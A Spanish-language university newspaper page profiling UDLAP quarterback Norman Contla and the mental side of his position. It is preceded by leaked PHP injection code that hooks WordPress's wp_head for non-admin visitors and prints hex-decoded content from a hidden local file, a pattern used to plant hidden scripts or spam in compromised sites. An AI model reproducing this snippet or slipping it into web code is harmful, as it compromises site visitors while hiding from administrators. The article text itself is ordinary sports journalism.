if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Quarterbacks, el juego mental y estratégico – La Opinión Universitaria La Opinión Universitaria
Menu

Quarterbacks, el juego mental y estratégico

 

Son casi inmediatas las decisiones que toman los jugadores del equipo representativo de futbol americano de la Universidad de las Américas Puebla (UDLAP) dentro del campo y son aún mayores las que toman los mariscales de campo para lograr las jugadas importantes y por ende definir partidos.

Al ser un deporte de conjunto, cada uno de los jugadores es responsable de ciertas tareas dentro del emparrillado por lo que, además de necesitar aportaciones físicas para proteger, se requieren habilidades mentales para analizar y estudiar el juego, esa es probablemente una de las funciones primordiales de un mariscal de campo.

“El fútbol americano todos los identifican por un deporte físico y de contacto, pero como quarterback se necesita un mejor dominio de la parte mental del juego que físico”, dijo Norman Contla, quarterback de los verdes.

El jugador conoce perfectamente la importancia que tiene su posición dentro del emparrillado por lo que debe ser capaz de tener respuesta en segundos y darle movimiento al balón para acercarse a la zona de anotación, “ser un líder ofensivo y ser un jugador en el que mis compañeros confíen”, destacó el jugador de Aztecas, desde 2012 hasta 2015 para posteriormente regresar este año al equipo Attack and Attitude.

Resultaría imposible llevar a cabo un partido sin la existencia de un quarterback dentro del campo, pues son los encargados de lanzar o entregar el balón para conseguir puntos que los adelanten en el marcador.

“Por la naturaleza de la posición, somos líderes de la ofensa y la mayor parte de las decisiones las tomamos nosotros, así que, la confianza de nuestros compañeros en que nosotros tomaremos la decisión correcta es indispensable, obviamente, esta confianza se gana con la preparación y el estudio del juego” explicó Contla.

El trabajo indispensable que realiza Norman Contla en cada encuentro es digno de reconocer, pues darle dirección a la bola en cuestión de segundos y completar jugadas que hagan avanzar al equipo a la zona prometida requiere de una completa concentración, misma que logran teniendo en mente sus motivaciones e inspiraciones.

Así como sus motivaciones forman parte esencial para su correcto desempeño, el jugador tiene inspiraciones para continuar con sus carreras deportivas, “mi familia nunca se ha perdido un juego, las únicas veces que no estuvieron presentes fue cuando estuve en España y en China, pero igual los vieron por internet, darles gusto de verme jugar, que disfruten de mis juegos y poner el nombre de mi familia en alto es mi mayor inspiración”.

Ambos jugadores están convencidos que el éxito que han logrado hasta ahora es debido al esfuerzo realizado durante años, “para alcanzar el éxito en cualquier actividad creo que se necesita compromiso y disciplina”, puntualizó Contla.

 

 

No comments

Deja una respuesta

Tweets recientes